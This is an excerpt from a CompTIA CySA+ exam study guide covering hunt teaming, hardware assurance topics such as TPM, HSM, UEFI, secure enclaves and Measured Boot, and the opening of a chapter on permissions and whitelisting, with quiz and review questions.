Hunt Teaming
Hunt teaming is a new approach to security that is
offensive in nature rather than defensive, which has been
the common approach of security teams in the past.
Hunt teams work together to detect, identify, and
understand advanced and determined threat actors. A
hunt team is a costly investment on the part of an
organization. They target the attackers. To use a bank
analogy, when a bank robber compromises a door to rob
a bank, defensive measures would say get a better door,
while offensive measures (hunt teaming) would say
eliminate the bank robber. These cyber guns-for-hire are
another tool in the kit.
Hunt teaming also refers to a collection of techniques
used by security personnel to bypass traditional security
technologies to hunt down other attackers who may have
used similar techniques to mount attacks that have
already been identified, often by other companies. These
techniques help in identifying any systems compromised
using advanced malware that bypasses traditional
security technologies, such as an intrusion detection
system/intrusion prevention system (IDS/IPS) or an
antivirus application. As part of hunt teaming, security
professional could also obtain blacklists from sources
like DShield (https://www.dshield.org/). These
blacklists would then be compared to existing DNS
entries to see if communication was occurring with
systems on these blacklists that are known attackers.
Hunt teaming can also emulate prior attacks so that
security professionals can better understand the
enterprise’s existing vulnerabilities and get insight into
how to remediate and prevent future incidents.
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in
the Introduction, you have several choices for exam
preparation: the exercises here, Chapter 22, “Final
Preparation,” and the exam simulation questions in the
Pearson Test Prep Software Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted
with the Key Topics icon in the outer margin of the page.
Table 8-8 lists a reference of these key topics and the
page numbers on which each is found.
Table 8-8 Key Topics in Chapter 8
DEFINE KEY TERMS
Define the following key terms from this chapter and
check your answers in the glossary:
asset tagging
geotagging
geofencing
radio frequency identification (RFID)
segmentation
extranet
demilitarized zone (DMZ)
virtual local-area network (VLAN)
jumpbox
system isolation
air gap
bastion host
dual-homed firewall
multihomed firewall
screened host firewall
screened subnet
control plane
data plane
management plane
virtual storage area network (SAN)
virtual private cloud (VPC)
virtual private network (VPN)
Point-to-Point Tunneling Protocol (PPTP)
Layer 2 Tunneling Protocol (L2TP)
Internet Protocol Security (IPsec)
Authentication Header (AH)
Encapsulating Security Payload (ESP)
Internet Security Association and Key Management
Protocol (ISAKMP)
Internet Key Exchange (IKE)
Secure Sockets Layer/Transport Layer Security
(SSL/TLS)
change management
Type 1 hypervisor
Type 2 hypervisor
VM escape
virtual desktop infrastructure (VDI)
containerization
multifactor authentication (MFA)
knowledge factor authentication
ownership factor authentication
characteristic factor authentication
single sign-on (SSO)
Active Directory (AD)
Secure European System for Applications in a
Multivendor Environment (SESAME)
Service Provisioning Markup Language (SPML)
Security Assertion Markup Language (SAML)
OpenID
Shibboleth
role-based access control (RBAC)
attribute-based access control (ABAC)
mandatory access control (MAC)
cloud access security broker (CASB)
honeypot
symmetric algorithms
stream-based ciphers
blocks ciphers
asymmetric algorithms
Secure Shell (SSH)
public key infrastructure (PKI)
registration authority (RA)
certificate authority (CA)
Online Certificate Status Protocol (OCSP)
certificate revocation list (CRL)
active defense
hunt teaming
REVIEW QUESTIONS
1. _____________________ is the process of
placing physical identification numbers of some
sort on all assets.
2. List at least two examples of segmentation.
3. Match the following terms with their definitions.
4. In a(n) _____________________, two
firewalls are used, and traffic must be inspected at
both firewalls before it can enter the internal
network
5. List at least one of the network architecture planes.
6. Match the following terms with their definitions.
7. ____________________________ handles
the creation of a security association for the session
and the exchange of keys in IPsec.
8. List at least two advantages of SSL/TLS.
9. Match the following terms with their definitions.
10. ______________________ are authentication
factors that rely in something you have in your
possession
Chapter 9. Software
Assurance Best Practices
[This content is currently
in development.]
This content is currently in development.
Chapter 10. Hardware
Assurance Best Practices
This chapter covers the following topics related to
Objective 2.3 (Explain hardware assurance best
practices) of the CompTIA Cybersecurity Analyst
(CySA+) CS0-002 certification exam:
• Hardware root of trust: Introduces the
Trusted Platform Module (TPM) and hardware
security module (HSM)
• eFuse: Covers the dynamic real-time
reprogramming of computer chips
• Unified Extensible Firmware Interface
(UEFI): Discusses the newer UEFI firmware
interface
• Trusted foundry: Describes a program for
hardware sourcing assurance
• Secure processing: Covers Trusted Execution,
secure enclave, processor security extensions, and
atomic execution
• Anti-tamper: Explores methods of preventing
physical attacks
• Self-encrypting drive: Covers automatic drive
protections
• Trusted firmware updates: Discusses methods
for safely acquiring firmware updates
• Measured Boot and attestation: Covers boot
file protections
• Bus encryption: Describes the use of encrypted
program instructions on a data bus
Organizations acquire hardware and services as part of
day-to-day business. The supply chain for tangible
property is vital to every organization. An organization
should understand all risks for the supply chain and
implement a risk management program that is
appropriate for it. This chapter discusses best practices
for ensuring that all hardware is free of security issues
out of the box.
“DO I KNOW THIS
ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to
assess whether you should read the entire chapter. If you
miss no more than one of these ten self-assessment
questions, you might want to skip ahead to the “Exam
Preparation Tasks” section. Table 10-1 lists the major
headings in this chapter and the “Do I Know This
Already?” quiz questions covering the material in those
headings so that you can assess your knowledge of these
specific areas. The answers to the “Do I Know This
Already?” quiz appear in Appendix A.
Table 10-1 “Do I Know This Already?” Foundation
Topics Section-to-Question Mapping
1. Which of the following is a draft publication that
gives guidelines on hardware-rooted security in
mobile devices?
a. NIST SP 800-164
b. IEEE 802.11ac
c. FIPS 120
d. IEC/IOC 270017
2. Which of the following allows for the dynamic realtime reprogramming of computer chips?
a. TAXII
b. eFuse
c. UEFI
d. TPM
3. Which of the following is designed as a replacement
for the traditional PC BIOS?
a. TPM
b. Secure boot
c. UEFI
d. NX bit
4. Which of the following ensures that systems have
access to leading-edge integrated circuits from
secure, domestic sources?
a. DoD
b. FIPS 120
c. OWASP
d. Trusted Foundry
5. Which of the following is a part of an operating
system that cannot be compromised even when the
operating system kernel is compromised?
a. Secure enclave
b. Processor security extensions
c. Atomic execution
d. XN bit
6. Which of the following technologies can zero out
sensitive data if it detects penetration of its security
and may even do this with no power ?
a. TPM
b. Anti-tamper
c. Secure enclave
d. Measured boot
7. Which of the following is used to provide
transparent encryption on self-encrypting drives?
a. DEK
b. TPM
c. UEFI
d. ENISA
8. Which of the following is the key to trusted
firmware updates?
a. Obtain firmware updates only from the vendor
directly
b. Use a third-party facilitator to obtain updates
c. Disable Secure Boot
d. Follow the specific directions with the update
9. Windows Secure Boot is an example of what
technology?
a. Security extensions
b. Secure enclave
c. UEFI
d. Measured boot
10. What is used by newer Microsoft operating systems
to protect certificates, BIOS, passwords, and
program authenticity?
a. Security extensions
b. Bus encryption
c. UEFI
d. Secure enclaves
FOUNDATION TOPICS
HARDWARE ROOT OF
TRUST
NIST SP 800-164 is a draft Special Publication that gives
guidelines on hardware-rooted security in mobile
devices. It defines three required security components
for mobile devices: Roots of Trust (RoTs), an
application programming interface (API) to expose the
RoTs to the platform, and a Policy Enforcement Engine
(PEnE).
Roots of Trust are the foundation of assurance of the
trustworthiness of a mobile device. RoTs must always
behave in an expected manner because their misbehavior
cannot be detected. Hardware RoTs are preferred over
software RoTs due to their immutability, smaller attack
surfaces, and more reliable behavior. They can provide a
higher degree of assurance that they can be relied upon
to perform their trusted function or functions. Software
RoTs could provide the benefit of quick deployment to
different platforms. To support device integrity,
isolation, and protected storage, devices should
implement the following RoTs:
• Root of Trust for Storage (RTS)
• Root of Trust for Verification (RTV)
• Root of Trust for Integrity (RTI)
• Root of Trust for Reporting (RTR)
• Root of Trust for Measurement (RTM)
The RoTs need to be exposed by the operating system to
applications through an open API. This provides
application developers a set of security services and
capabilities they can use to secure their applications and
protect the data they process. By providing an abstracted
layer of security services and capabilities, these APIs can
reduce the burden on application developers to
implement low-level security features, and instead allow
them to reuse trusted components provided in the RoTs
and the OS. The APIs should be standardized within a
given mobile platform and, to the extent possible, across
platforms. Applications can use the APIs, and the
associated RoTs, to request device integrity reports,
protect data through encryption services provided by the
RTS, and store and retrieve authentication credentials
and other sensitive data.
The PEnE enforces policies on the device with the help of
other device components and enables the processing,
maintenance, and management of policies on both the
device and in the information owners’ environments. The
PEnE provides information owners with the ability to
express the control they require over their information.
The PEnE needs to be trusted to implement the
information owner’s requirements correctly and to
prevent one information owner’s requirements from
adversely affecting another’s. To perform key functions,
the PEnE needs to be able to query the device’s
configuration and state.
Mobile devices should implement the following three
mobile security capabilities to address the challenges
with mobile device security:
• Device integrity: Device integrity is the absence
of corruption in the hardware, firmware, and
software of a device. A mobile device can provide
evidence that it has maintained device integrity if
its software, firmware, and hardware
configurations can be shown to be in a state that is
trusted by a relying party.
• Isolation: Isolation prevents unintended
interaction between applications and information
contexts on the same device.
• Protected storage: Protected storage preserves
the confidentiality and integrity of data on the
device while at rest, while in use (in the event an
unauthorized application attempts to access an
item in protected storage), and upon revocation of
access.
Trusted Platform Module (TPM)
Controlling network access to devices is helpful, but in
many cases, devices such as laptops, tablets, and
smartphones leave your network, leaving behind all the
measures you have taken to protect the network. There is
also a risk of these devices being stolen or lost. For these
situations, the best measure to take is full disk
encryption.
The best implementation of full disk encryption requires
and makes use of a Trusted Platform Module
(TPM) chip. A TPM chip is a security chip installed on a
computer’s motherboard that is responsible for
protecting symmetric and asymmetric keys, hashes, and
digital certificates. This chip provides services to protect
passwords and encrypt drives and digital rights, making
it much harder for attackers to gain access to the
computers that have TPM chips enabled.
Two particularly popular uses of TPM are binding and
sealing. Binding actually “binds” the hard drive through
encryption to a particular computer. Because the
decryption key is stored in the TPM chip, the hard drive’s
contents are available only when the drive is connected
to the original computer. But keep in mind that all the
contents are at risk if the TPM chip fails and a backup of
the key does not exist.
Sealing, on the other hand, “seals” the system state to a
particular hardware and software configuration. This
prevents attackers from making any changes to the
system. However, it can also make installing a new piece
of hardware or a new operating system much harder. The
system can only boot after the TPM chip verifies system
integrity by comparing the original computed hash value
of the system’s configuration to the hash value of its
configuration at boot time.
A TPM chip consists of both static memory and versatile
memory that is used to retain the important information
when the computer is turned off:
• Endorsement key (EK): The EK is persistent
memory installed by the manufacturer that
contains a public/private key pair.
• Storage root key (SRK): The SRK is persistent
memory that secures the keys stored in the TPM.
• Attestation identity key (AIK): The AIK is
versatile memory that ensures the integrity of the
EK.
• Platform configuration register (PCR)
hash: A PCR hash is versatile memory that stores
data hashes for the sealing function.
• Storage keys: A storage key is versatile memory
that contains the keys used to encrypt the
computer’s storage, including hard drives, USB
flash drives, and so on.
BitLocker and BitLocker to Go by Microsoft are wellknown full disk encryption products. The former is used
to encrypt hard drives, including operating system
drives, and the latter is used to encrypt information on
portable devices such as USB devices. However, there are
other options. Additional whole disk encryption products
include
• PGP Whole Disk Encryption
• SecurStar DriveCrypt
• Sophos SafeGuard
• Trend Micro Maximum Security
Virtual TPM
A virtual TPM (VTPM) chip is a software object that
performs the functions of a TPM chip. It is a system that
enables trusted computing for an unlimited number of
virtual machines on a single hardware platform. A VTPM
makes secure storage and cryptographic functions
available to operating systems and applications running
in virtual machines.
Figure 10-1 shows one possible implementation of VTPM
by IBM. The TPM chip in the host system is replaced by a
more powerful VTPM (PCIXCC-vTPM). The virtual
machine (VM) named Dom-TPM is a VM whose only
purpose is to proxy for the PCIXCC-vTPM and make
TPM instances available to all other VMs running on the
system.
Figure 10-1 vTPM Possible Solution 1
Another possible approach suggested by IBM is to run
VTPMs on each VM, as shown in Figure 10-2. In this
case, the VM named Dom-TPM talks to the physical TPM
chip in the host and maintains separate TPM instances
for each VM.
Figure 10-2 VTPM Possible Solution 2
Hardware Security Module (HSM)
A hardware security module (HSM) is an
appliance that safeguards and manages digital keys used
with strong authentication and provides crypto
processing. It attaches directly to a computer or server.
Among the functions of an HSM are
• Onboard secure cryptographic key generation
• Onboard secure cryptographic key storage and
management
• Use of cryptographic and sensitive data material
• Offloading of application servers for complete
asymmetric and symmetric cryptography
HSM devices can be used in a variety of scenarios,
including the following:
• In a PKI environment to generate, store, and
manage key pairs
• In card payment systems to encrypt PINs and to
load keys into protected memory
• To perform the processing for applications that
use TLS/SSL
• In Domain Name System Security Extensions
(DNSSEC; a secure form of DNS that protects the
integrity of zone files) to store the keys used to
sign the zone file
There are some drawbacks to an HSM, including the
following:
• High cost
• Lack of a standard for the strength of the random
number generator
• Difficulty in upgrading
When selecting an HSM product, you must ensure that it
provides the services needed, based on its application.
Remember that each HSM has different features and
different encryption technologies, and some HSM
devices might not support a strong enough encryption
level to meet an enterprise’s needs. Moreover, you
should keep in mind the portable nature of these devices
and protect the physical security of the area where they
are connected.
MicroSD HSM
A microSD HSM is an HSM that connects to the
microSD port on a device that has such a port. The card
is specifically suited for mobile apps written for Android
and is supported by most Android phones and tablets
with a microSD card slot.
Moreover, some microSD cards can be made to support
various cryptographic algorithms, such as AES, RSA,
SHA-1, SHA-256, and Triple DES, as well as the DiffieHellman key exchange. This is an advantage over
microSD cards that do not support this, which enables
them to provide the same protections as microSD HSM.
EFUSE
Computer logic is generally hard-coded onto a chip and
cannot be changed after the chip is manufactured. An
eFuse allows for the dynamic real-time reprogramming
of computer chips. Utilizing a set of eFuses, a chip
manufacturer can allow for the circuits on a chip to
change while it is in operation.
One use is to prevent downgrading the firmware of a
device. Systems equipped with an eFuse will check the
number of burnt fuses before attempting to install new
firmware. If too many fuses are burnt (meaning the
firmware to be installed is older than the current
firmware), then the bootloader will prevent installation
of the older firmware.
An eFuse can also be used to help secure a stolen device.
For example, the Samsung eFuse uses an eFuse to
indicate when an untrusted (non-Samsung) path is
discovered. Once the eFuse is set (when the path is
discovered), the device cannot read the data previously
stored.
UNIFIED EXTENSIBLE
FIRMWARE INTERFACE
(UEFI)
A computer’s BIOS contains the basic instruction that a
computer needs to boot and load the operating system
from a drive. The process of updating the BIOS with the
latest software is referred to as flashing the BIOS.
Security professionals should ensure that any BIOS
updates are obtained from the BIOS vendor and have not
been tampered with in any way.
The traditional BIOS has been replaced with the
Unified Extensible Firmware Interface (UEFI).
UEFI maintains support for legacy BIOS devices, but is
considered a more advanced interface than traditional
BIOS. BIOS uses the master boot record (MBR) to save
information about the hard drive data, while UEFI uses
the GUID partition table (GPT). BIOS partitions were a
maximum of 4 partitions, each being only 2 terabytes
(TB). UEFI allows up to 128 partitions, with the total
disk limit being 9.4 zettabytes (ZB) or 9.4 billion
terabytes. UEFI is also faster and more secure than
traditional BIOS. UEFI Secure Boot requires boot
loaders to have a digital signature.
UEFI is an open standard interface layer between the
firmware and the operating system that requires
firmware updates to be digitally signed. Security
professionals should understand the following points
regarding UEFI:
• Designed as a replacement for traditional PC
BIOS.
• Additional functionality includes support for
Secure Boot, network authentication, and
universal graphics drivers.
• Protects against BIOS malware attacks including
rootkits.
Secure Boot requires that all boot loader components
(e.g., OS kernel, drivers) attest to their identity (digital
signature) and the attestation is compared to the
trusted list. More on Secure/Measured Boot and
attestation will be covered later in the “Measured Boot
and Attestation” section.
• When a computer is manufactured, a list of keys
that identify trusted hardware, firmware, and
operating system loader code (and in some
instances, known malware) is embedded in the
UEFI.
• Ensures the integrity and security of the firmware.
• Prevents malicious files from being loaded.
• Can be disabled for backward compatibility.
UEFI operates between the OS layer and the firmware
layer, as shown in Figure 10-3.
Figure 10-3 UEFI
TRUSTED FOUNDRY
You must be concerned with the safety and the integrity
of the hardware that you purchase. The following are
some of the methods used to provide this assurance:
• Trusted Foundry: The Trusted Foundry
program can help you exercise care in ensuring
the authenticity and integrity of the components
of hardware purchased from a vendor. This U.S.
Department of Defense (DoD) program identifies
“trusted vendors” and ensures a “trusted supply
chain.” A trusted supply chain begins with trusted
design and continues with trusted mask, foundry,
packaging/assembly, and test services. It ensures
that systems have access to leading-edge
integrated circuits from secure, domestic sources.
At the time of this writing, 77 vendors have been
certified as trusted.
• Source authenticity of hardware: When
purchasing hardware to support any network or
security solution, a security professional must
ensure that the hardware’s authenticity can be
verified. Just as expensive consumer items such as
purses and watches can be counterfeited, so can
network equipment. While the dangers with
counterfeit consumer items are typically confined
to a lack of authenticity and potentially lower
quality, the dangers presented by counterfeit
network gear can extend to the presence of
backdoors in the software or firmware. Always
purchase equipment directly from the
manufacturer when possible, and when
purchasing from resellers, use caution and insist
on a certificate of authenticity. In any case where
the price seems too good to be true, keep in mind
that it may be an indication the gear is not
authentic.
• OEM documentation: One of the ways you can
reduce the likelihood of purchasing counterfeit
equipment is to insist on the inclusion of
verifiable original equipment manufacturer
(OEM) documentation. In many cases, this
paperwork includes anti-counterfeiting features.
Make sure to use the vendor website to verify all
the various identifying numbers in the
documentation.
SECURE PROCESSING
Secure processing is a concept that encompasses a
variety of technologies to prevent to prevent any insecure
actions on the part of the CPU or processor. In some
cases these technologies involve securing the actions of
the processor itself, while other approaches tackle the
issue where the data is stored. This section introduces
some of these technologies and approaches.
Trusted Execution
Trusted Execution (TE) is a collection of features that
is used to verify the integrity of the system and
implement security policies, which together can be used
to enhance the trust level of the complete system. An
example is the Intel Trusted Execution Technology (Intel
TXT). This approach is shown in Figure 10-4.
Figure 10-4 Intel Trusted Execution Technology
Secure Enclave
A secure enclave is a part of an operating system that
cannot be compromised even when the operating system
kernel is compromised, because the enclave has its own
CPU and is separated from the rest of the system. This
means security functions remain intact even when
someone has gained control of the OS. Secure enclaves
are a relatively recent technology being developed to
provide additional security. Cisco, Microsoft, and Apple
all have implementations of secure enclaves that differ in
implementation but all share the same goal of creating
an area that cannot be compromised even when the OS
is.
Processor Security Extensions
Processor security extensions are sets of securityrelated instruction codes that are built into some modern
CPUs. An example is Intel Software Guard Extensions
(Intel SGX). It defines private regions of memory, called
enclaves, whose contents are protected and unable to be
either read or saved by any process outside the enclave
itself, including processes running at higher privilege
levels.
Another processor security technique is the use of the
NX and XN bits. These bits are related to processors.
Their respective meanings are as follows:
• NX (no-execute) bit: Technology used in CPUs
to segregate areas of memory for use by either
storage of processor instructions (code) or storage
of data
• XN (never execute) bit: Method for specifying
areas of memory that cannot be used for execution
When these bits are available in the architecture of the
system, they can be used to protect sensitive information
from memory attacks. By utilizing the capability of the
NX bit to segregate memory into areas where storage of
processor instructions (code) and storage of data are
kept separate, many attacks can be prevented. Also, the
capability of the XN bit to mark certain areas of memory
that are off-limits to execution of code can prevent other
memory attacks as well.
Atomic Execution
Atomic execution in concurrent programming are
program operations that run independently of any other
processes (threads). Making the operation atomic
consists of using synchronization mechanisms to make
sure that the operation is seen, from any other thread, as
a single, atomic operation. This increases security by
preventing one thread from viewing the state of the data
when the first thread is still in the middle of the
operation. Atomicity also means that the operation of the
thread is either completely finished or is rolled back to
its initial state (there’s no such thing as partially done).
ANTI-TAMPER
Anti-tamper technology is designed to prevent
access to sensitive information and encryption keys on a
device. Anti-tamper processors, for example, store and
process private or sensitive information, such as private
keys or electronic money credit. The chips are designed
so that the information is not accessible through external
means and can be accessed only by the embedded
software, which should contain the appropriate security
measures, such as required authentication credentials.
Some of these chips take a different approach and zero
out the sensitive data if they detect penetration of their
security, and some can even do this with no power.
It also should not be possible for unauthorized persons
to access and change the configuration of any devices.
This means additional measures should be followed to
prevent this. Tampering includes defacing, damaging, or
changing the configuration of a device. Integrity
verification programs should be used by applications to
look for evidence of data tampering, errors, and
omissions.
SELF-ENCRYPTING DRIVES
Self-encrypting drives do exactly as the name
implies: they encrypt themselves without any user
intervention. The process is so transparent to the user
that the user may not even be aware the encryption is
occurring. It uses a unique and random data encryption
key (DEK). When data is written to the drive, it is
encrypted, and when the data is read from the drive, it is
decrypted, as shown in Figure 10-5.
Figure 10-5 Self-encrypting drive
TRUSTED FIRMWARE
UPDATES
Hardware and firmware vulnerabilities are expected to
become an increasing target for sophisticated attackers.
While typically only successful when mounted by the
skilled hands of a nation-state or advanced persistent
threat (APT) group, an attack on hardware and firmware
can be devastating because this firmware forms the
platform for the entire device.
Firmware includes any type of instructions stored in
non-volatile memory devices such as read-only memory
(ROM), electrically erasable programmable read-only
memory (EPROM), or Flash memory. BIOS and UEFI
code are the most common examples for firmware.
Computer BIOS doesn’t go bad; however, it can become
out of date or contain bugs. In the case of a bug, an
upgrade will correct the problem. An upgrade may also
be indicated when the BIOS doesn’t support some
component that you would like to install, such as a larger
hard drive or a different type of processor.
Today’s BIOS is typically written to an EEPROM chip
and can be updated through the use of software. Each
manufacturer has its own method for accomplishing this.
Check out the manufacturer’s documentation for
complete details. Regardless of the exact procedure used,
the update process is referred to as flashing the BIOS. It
means the old instructions are erased from the EEPROM
chip, and the new instructions are written to the chip.
Firmware can be updated by using an update utility from
the motherboard vendor. In many cases, the steps are as
follows.
Step 1. Download the update file to a flash drive.
Step 2. Insert the flash drive and reboot the
machine.
Step 3. Use the specified key sequence to enter the
UEFI/BIOS setup.
Step 4. If necessary, disable Secure Boot.
Step 5. Save the changes and reboot again.
Step 6. Re-enter the CMOS settings.
Step 7. Choose the boot options and boot from the
flash drive.
Step 8. Follow the specific directions with the
update to locate the upgrade file on the flash
drive.
Step 9. Execute the file (usually by typing flash).
Step 10. While the update is completing, ensure that
you maintain power to the device.
The key to trusted firmware updates is contained in Step
1. Only obtain firmware updates from the vendor
directly. Never use a third-party facilitator for this. Also
make sure you verify the hash value that comes along
with the update to ensure that it has not been altered
since its creation.
MEASURED BOOT AND
ATTESTATION
Attestation is the process of insuring or attesting to the
fact that a piece of software or firmware has integrity or
that it has not been altered from its original state. It is
used in several boot methods to check all elements used
in the boot process to ensure that malware has not
altered the files or introduced new files into the process.
Let’s look at some of these Secure Boot methods.
Measured Boot, also known as Secure Boot, is a term
that applies to several technologies that follow the Secure
Boot standard. Its implementations include Windows
Secure Boot, measured launch, and Integrity
Measurement Architecture (IMA). Figure 10-6 shows the
three main actions related to Secure Boot in Windows,
which are described in the following list:
Figure 10-6 Secure Boot
1. The firmware verifies all UEFI executable files and
the OS loader to be sure they are trusted.
2. Windows boot components verify the signature on
each component to be loaded. Any untrusted
components are not loaded and trigger
remediation.
3. The signatures on all boot-critical drivers are
checked as part of Secure Boot verification in
Winload (Windows Boot Loader) and by the Early
Launch Anti-Malware driver.
The disadvantage is that systems that ship with UEFI
Secure Boot enabled do not allow the installation of any
other operating system. This prevents installing any
other operating systems or running any live Linux media.
Measured Launch
A measured launch is a launch in which the software and
platform components have been identified, or
“measured,” using cryptographic techniques. The
resulting values are used at each boot to verify trust in
those components. A measured launch is designed to
prevent attacks on these components (system and BIOS
code) or at least to identify when these components have
been compromised. It is part of Intel TXT. TXT
functionality is leveraged by software vendors including
HyTrust, PrivateCore, Citrix, and VMware.
An application of measured launch is Measured Boot by
Microsoft in Windows 10 and Windows Server 2019. It
creates a detailed log of all components that loaded
before the anti-malware. This log can be used to both
identify malware on the computer and maintain evidence
of boot component tampering. One possible
disadvantage of measured launch is potential slowing of
the boot process.
Integrity Measurement Architecture
Another approach that attempts to create and measure
the runtime environment is an open source trusted
computing component called Integrity Measurement
Architecture (IMA), mentioned earlier in this chapter.
IMA creates a list of components and anchors the list to
the TPM chip. It can use the list to attest to the system’s
runtime integrity.
BUS ENCRYPTION
The CPU is connected to an address bus. Memory and
I/O devices recognize this address bus. These devices can
then communicate with the CPU, read requested data,
and send it to the data bus. Bus encryption protects
the data traversing these buses. Bus encryption is used
by newer Microsoft operating systems to protect
certificates, BIOS, passwords, and program authenticity.
Bus encryption is necessary not only to prevent
tampering of encrypted instructions that may be easily
discovered on a data bus or during data transmission,
but also to prevent discovery of decrypted instructions
that may reveal security weaknesses that an intruder can
exploit.
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in
the Introduction, you have several choices for exam
preparation: the exercises here, Chapter 22, “Final
Preparation,” and the exam simulation questions in the
Pearson Test Prep Software Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted
with the Key Topics icon in the outer margin of the page.
Table 10-2 lists a reference of these key topics and the
page numbers on which each is found.
Table 10-2 Key Topics in Chapter 10
DEFINE KEY TERMS
Define the following key terms from this chapter and
check your answers in the glossary:
Roots of Trust (RoTs)
Trusted Platform Module (TPM)
virtual TPM (VTPM)
hardware security module (HSM)
microSD HSM
eFuse
Unified Extensible Firmware Interface (UEFI)
Secure Boot
attestation
Trusted Foundry
secure processing
Trusted Execution
secure enclave
processor security extensions
atomic execution
anti-tamper technology
self-encrypting drives
attestation
Measured Boot
bus encryption
REVIEW QUESTIONS
1. RoTs need to be exposed by the operating system to
applications through an open ___________.
2. List at least one of the contents of a TPM chip.
3. Match the following terms with their definitions.
4. _______________ requires that all boot loader
components (e.g., OS kernel, drivers) attest to their
identity (digital signature) and the attestation is
compared to the trusted list.
5. List the Intel example of the implementation of
processor security extensions.
6. Match the following terms with their definitions.
7. _____________ creates a list of components and
anchors the list to the TPM chip. It can use the list
to attest to the system’s runtime integrity.
8. What is the disadvantage of systems that ship with
UEFI Secure Boot enabled?
9. Match the following terms with their definitions.
10. The traditional BIOS has been replaced with the
____________________.
Chapter 11. Analyzing
Data as Part of Security
Monitoring Activities [This
content is currently in
development.]
This content is currently in development.
Chapter 12. Implementing
Configuration Changes to
Existing Controls to
Improve Security
This chapter covers the following topics related to
Objective 3.2 (Given a scenario, implement configuration
changes to existing controls to improve security) of the
CompTIA Cybersecurity Analyst (CySA+) CS0-002
certification exam:
• Permissions: Discusses the importance of
proper permissions management
• Whitelisting: Covers the process of whitelisting
and its indications
• Blacklisting: Describes a blacklisting process
used to deny access
• Firewall: Identifies key capabilities of various
firewall platforms
• Intrusion prevention system (IPS) rules:
Discusses rules used to automate response
• Data loss prevention (DLP): Covers the DLP
process used to prevent exfiltration
• Endpoint detection and response (EDR):
Describes a technology that addresses the need for
continuous monitoring
• Network access control (NAC): Identifies the
processes used by NAC technology
• Sinkholing: Discusses the use of this networking
tool
• Malware signatures: Describes the importance
of malware signature and development/rule
writing
• Sandboxing: Reviews the use of this software
virtualization technique to isolate apps from
critical system resources
• Port Security: Covers the role of port security in
preventing attacks
In many cases, security monitoring data indicates a need
to change or implement new controls to address new
threats. These changes might be small configuration
adjustments to a security device or they might include
large investments in new technology. Regardless of the
scope, these actions should be driven by the threat at
hand and the controls should be exposed to the same
cost/benefit analysis to which all organizational activities
are exposed.
“DO I KNOW THIS
ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to
assess whether you should read the entire chapter. If you
miss no more than one of these 12 self-assessment
questions, you might want to skip ahead to the “Exam
Preparation Tasks” section. Table 12-1 lists the major
headings in this chapter and the “Do I Know This
Already?” quiz questions covering the material in those
headings so that you can assess your knowledge of these
specific areas. The answers to the “Do I Know This
Already?” quiz appear in Appendix A.
Table 12-1 “Do I Know This Already?” Foundation
Topics Section-to-Question Mapping
1. Which of the following is an example of a right and
not a permission?
a. Read access to a file
b. Ability to delete a file
c. Ability to reset passwords
d. Ability to change the permissions of a file
2. When you allow a file type at the exclusion of all
other file types, you have created what?
a. Whitelist
b. Access list
c. Blacklist
d. Graylist
3. Which of the following requires the most effort to
maintain?
a. Whitelist
b. Access list
c. Blacklist
d. Graylist
4. Which of the following is a category of devices that
attempt to address traffic inspection and
application awareness shortcomings of a
traditional stateful firewall?
a. NGFW
b. Bastion host
c. Three-legged firewall
d. Proxy
5. Which of the following is a type of IPS and is an
expert system that uses a knowledge base, an
inference engine, and programming?
a. Rule-based
b. Signature-based
c. Heuristics-based
d. Error-based
6. Preventing data exfiltration is the role of which of
the following?
a. Trend analysis
b. DLP
c. NAC
d. Port security
7. Which of the following shifts security from a
reactive threat approach to one that can detect and
prevent threats before they reach the organization?
a. NAC
b. DAC
c. EDR
d. DLP
8. Which of the following is a service that goes beyond
authentication of the user and includes
examination of the state of the computer the user is
introducing to the network when making a remoteaccess or VPN connection to the network?
a. NAC
b. DAC
c. EDR
d. DLP
9. Which of the following can be used to prevent a
compromised host from communicating back to
the attacker?
a. Sinkholing
b. DNSSec
c. NASC
d. Port security
10. Which of the following could be a filename or could
be some series of characters that can be tied
uniquely to the malware?
a. Key
b. Signature
c. Fingerprint
d. Scope
11. Which of the following allows you to run a possibly
malicious program in a safe environment so that it
doesn’t infect the local system?
a. Sandbox
b. Secure memory
c. Secure enclave
d. Container
12. Which of the following is referred to as Layer 2
security?
a. Sandbox
b. Port security
c. Encoding
d. Subnetting
FOUNDATION TOPICS
PERMISSIONS
Permissions are granted or denied at the file, folder, or
other object level. Common permission types include
Read, Write, and Full Control. Data custodians or
administrators will grant users permissions on a file or
folder based on the file owner’s request to do so.
Rights allow administrators to assign specific privileges
and logon rights to groups or users. Rights manage who
is allowed to perform certain operations on an entire
computer or within a domain, rather than on a particular
object within a computer. While user permissions are
granted by an object’s owner, user rights are assigned
using a computer’s local security policy or a domain
security policy. User rights apply to user accounts, while
permissions apply to objects.
Rights include the ability to log on to a system
interactively, which is a logon right, or the ability to back
up files, which is considered a privilege. User rights are
divided into two categories: privileges and logon rights.
Privileges are the right of an account, such as a user or
group account, to perform various system-related
operations on the local computer, such as shutting down
the system, loading device drivers, or changing the
system time. Logon rights control how users are allowed
access to the computer, including logging on locally or
through a network connection or whether as a service or
as a batch job.
Conflicts can occur in situations where the rights that are
required to administer a system overlap the rights of
resource ownership. When rights conflict, a privilege
overrides a permission.
Many times an attacker compromises a device by altering
the permissions, either in the local database or in entries
related to the device in the directory service server. All
permissions should undergo a review to ensure that all
are in the appropriate state. The appropriate state may
not be the state they were in before the event. Sometimes
you may discover that although permissions were not set
in a dangerous way prior to an event, they are not
correct. Make sure to check the configuration database to
ensure that settings match prescribed settings. You
should also make changes to the permissions based on
lessons learned during an event. In that case, ensure that
the new settings undergo a change control review and
that any approved changes are reflected in the
configuration database.
WHITELISTING AND
BLACKLISTING
Whitelisting occurs when a list of acceptable e-mail
addresses, Internet addresses, websites, applications, or
some other identifier is configured as good senders or as
allowed to send. Blacklisting identifies bad senders.
Graylisting is somewhere in between the two, listing
entities that cannot be identified as whitelist or blacklist
items. In the case of graylisting, the new entity must pass
through a series of tests to determine whether it will be
whitelisted or blacklisted. Whitelisting, blacklisting, and
graylisting are commonly used with spam filtering tools.
But there are other used for whitelists and blacklists as
well. They are used in routes to enforce ACLs and in
switches to enforce port security.
Application Whitelisting and
Blacklisting
Application whitelists are lists of allowed applications
(with all others excluded), and blacklists are lists of
